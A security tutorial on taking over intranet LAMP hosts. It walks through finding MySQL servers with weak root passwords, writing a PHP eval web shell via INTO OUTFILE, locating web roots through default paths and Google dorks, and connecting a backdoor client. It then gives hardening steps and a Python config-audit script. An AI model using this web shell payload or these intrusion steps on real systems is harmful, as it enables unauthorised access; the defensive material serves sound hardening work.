The following uses a LAMP (Linux, Apache, MySQL, PHP) stack as the example. Step 1: use a SQL scanning tool to find a host on the intranet that exposes port 3306 with a weak root password. 3306 is MySQL's default port (1433 is the default for Microsoft SQL Server, a different product; scanning for it will not find MySQL).
Step 2: log on to the MySQL service on that host remotely and use INTO OUTFILE to write a PHP one-liner (a web shell) into the web server's document root:

mysql -h <target host> -u root -p

SELECT "<?php eval($_POST['cmd']); ?>" INTO OUTFILE 'X:/document root directory/xxx.php';

(INTO OUTFILE requires the FILE privilege, and on newer MySQL versions the secure_file_priv setting confines where the server may write; the write only succeeds when secure_file_priv is empty and the mysqld process has permission on the target directory.)

Here we hit the first difficulty: the shell has to land in the host's DocumentRoot, but we do not know its absolute path.
Try the default installation path first (many test servers never change the basic configuration):

On Windows, the Apache 2.2 installer's default document root is C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/
On Linux, Apache's default document root is /var/www/ (newer Debian/Ubuntu and RHEL/CentOS packages use /var/www/html/)
On Windows with the XAMPP bundle, the path is c:/Program Files/xampp/htdocs/xampp/ (the XAMPP installer's own default is C:/xampp/htdocs/)
Note: if the site is also published on the Internet, Google hacking can reveal the absolute path. PHP warnings and notices print the full script path ("Warning: ... in /var/www/html/index.php on line 12"), so search for pages that leak them:

site:<domain name> Warning
site:www.2cto.com inurl:Warning
Step 3: connect to the uploaded shell with a PHP backdoor client such as Lanker's micro PHP backdoor client 2.0 (official release, a single .htm file). Commands are POSTed to the shell and run under the web server's account, which gives access to everything that account can read.
Defense measures:

1) The safest: make the services listen only on the local machine so nobody else can reach them (or allow access only from a whitelist).
   A. Apache: in conf/httpd.conf find the line Listen 80 and change it to Listen 127.0.0.1:80.
   B. MySQL: in my.ini (my.cnf on Linux) find the [mysqld] section and add bind-address = 127.0.0.1 under port = 3306. The directive is bind-address; a bare "bind" is not a recognized option. If the web application and MySQL run on different hosts, bind to the internal address and restrict port 3306 with a firewall instead. Also make sure root is only allowed from localhost ('root'@'localhost', not 'root'@'%') and that the web application's account does not hold the FILE privilege that INTO OUTFILE needs.

2) Use a strong root password such as ^mysql#xx.com.$ and keep it in a dedicated password manager such as the open-source KeePass.
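To check a host against the settings above, here is a small audit script added to this page; it is not part of the original article. It parses the Listen lines of httpd.conf and the [mysqld] section of my.ini/my.cnf, flags any listener that is not bound to loopback, and also flags an unset or empty secure_file_priv, the server setting that decides whether INTO OUTFILE is confined to a directory. The sample configs and the /var/lib/mysql-files path are constructed for the demonstration; to audit a real host, pass in the contents of its actual config files.

```python
"""Audit Apache 'Listen' and MySQL '[mysqld]' settings for the exposure described above.

Added example for this page, not code from the original article. It works on
config text (constructed samples at the bottom), so it runs offline; feed it the
contents of the real httpd.conf and my.ini/my.cnf to audit a host.
"""
import configparser
import ipaddress
import re
from typing import List, Optional


def _is_loopback(host: str) -> bool:
    """True for 127.0.0.0/8, ::1 and the name 'localhost'."""
    host = host.strip("[]")
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def audit_httpd_conf(text: str) -> List[str]:
    """One finding per Listen directive that is reachable from the network."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"Listen\s+(\S+)", line, re.IGNORECASE)
        if not m:
            continue
        target = m.group(1)
        # Accepted forms: "80", "127.0.0.1:80", "[::1]:80", "0.0.0.0:80".
        # A bare port means every interface.
        host = target.rsplit(":", 1)[0] if ":" in target else ""
        if not host or not _is_loopback(host):
            findings.append(f"httpd: '{line}' accepts connections from the network")
    return findings


def audit_my_cnf(text: str) -> List[str]:
    """Findings for [mysqld]: network-reachable listener, unconfined INTO OUTFILE."""
    findings = []
    # my.cnf is INI-like; drop '!include' lines, which configparser cannot read.
    body = "\n".join(l for l in text.splitlines() if not l.lstrip().startswith("!"))
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(body)
    if not cp.has_section("mysqld"):
        return ["mysql: no [mysqld] section found"]
    section = cp["mysqld"]

    def option(*names: str) -> Optional[str]:
        # MySQL accepts both dash and underscore spellings; None means absent.
        for name in names:
            if name in section:
                return (section[name] or "").strip().strip("\"'")
        return None

    bind = option("bind-address", "bind_address")
    if option("skip-networking", "skip_networking") is not None:
        pass  # TCP listener disabled entirely: nothing to reach on 3306
    elif bind is None:
        findings.append("mysql: no bind-address in [mysqld]; mysqld listens on all interfaces")
    elif not _is_loopback(bind):
        findings.append(f"mysql: bind-address={bind} is reachable from the network")

    # secure_file_priv: "" lets INTO OUTFILE write anywhere mysqld can, NULL
    # disables it, a directory confines it. Servers before 5.7.6 default to "",
    # so pin it explicitly in the config.
    sfp = option("secure-file-priv", "secure_file_priv")
    if not sfp:
        findings.append("mysql: secure_file_priv not set or empty; INTO OUTFILE is not confined to a directory")
    return findings


def audit(httpd_conf: str, my_cnf: str) -> List[str]:
    """Combined findings; an empty list means both services are loopback-only."""
    return audit_httpd_conf(httpd_conf) + audit_my_cnf(my_cnf)


# Constructed sample configs (assumptions for the demonstration, not real hosts).
WEAK_HTTPD = "Listen 80\n"
WEAK_MYCNF = "[mysqld]\nport = 3306\ndatadir = /var/lib/mysql\n"
HARDENED_HTTPD = "Listen 127.0.0.1:80\nListen [::1]:80\n"
HARDENED_MYCNF = (
    "[mysqld]\n"
    "port = 3306\n"
    "bind-address = 127.0.0.1\n"
    "secure_file_priv = /var/lib/mysql-files\n"
)

if __name__ == "__main__":
    for label, h, m in (("weak", WEAK_HTTPD, WEAK_MYCNF),
                        ("hardened", HARDENED_HTTPD, HARDENED_MYCNF)):
        print(label, audit(h, m) or ["no findings"])
```

The weak pair produces three findings (Apache on every interface, MySQL on every interface, INTO OUTFILE unconfined); the hardened pair produces none. skip-networking is treated as equivalent to a loopback bind, since it removes the TCP listener altogether.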